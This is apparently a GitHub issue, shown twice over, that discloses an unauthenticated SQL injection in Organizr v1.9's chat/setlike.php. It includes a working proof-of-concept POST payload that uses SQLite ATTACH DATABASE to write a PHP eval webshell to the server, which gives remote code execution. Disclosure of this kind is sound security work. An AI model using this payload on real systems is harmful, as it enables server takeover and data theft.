You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I would like to report for a Sqli vulnerability in Organizr-v1.9, This vulnerability can lead to RCE.
Analysis
The path of the vulnerability: chat/setlike.php
$messageid = $_POST["messageid"]; // Line 3(Source)...$db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'"); // Line 36(Sink)
There is no checking or filtering between the source and sink, which resulting SQLI vulnerabilities.
Permission Description
The vulnerability itself does not require any permission.(No permissions required)
However, the initial state of Organizer-v1.9 did not enable Chat, causing the data table "chatpack-log" to not exist. To turn on this switch, administrator privileges are required.
You can open it in the management menu or by sending the following request
POST /ajax.php?a=update-config
Data: authType=internal&chat=true
Then visit http://url/chat.php and enter somethings(No permissions required), and Now we got table "chatpack-log".
Poc
POST /chat/setlike.php
Data:
messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /*
Note that we used this vulnerability to write a webshell named shell.php to the server, which actually caused RCE.
Manual verification
The text was updated successfully, but these errors were encountered:
Hello,
I would like to report for a Sqli vulnerability in Organizr-v1.9, This vulnerability can lead to RCE.
Analysis
The path of the vulnerability: chat/setlike.php
There is no checking or filtering between the source and sink, which resulting SQLI vulnerabilities.
Permission Description
The vulnerability itself does not require any permission.(No permissions required)
However, the initial state of Organizer-v1.9 did not enable Chat, causing the data table "chatpack-log" to not exist. To turn on this switch, administrator privileges are required.
You can open it in the management menu or by sending the following request
POST /ajax.php?a=update-config
Data:
authType=internal&chat=true
Then visit http://url/chat.php and enter somethings(No permissions required), and Now we got table "chatpack-log".
Poc
POST /chat/setlike.php
Data:
messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /*
Note that we used this vulnerability to write a webshell named shell.php to the server, which actually caused RCE.
Manual verification
The text was updated successfully, but these errors were encountered: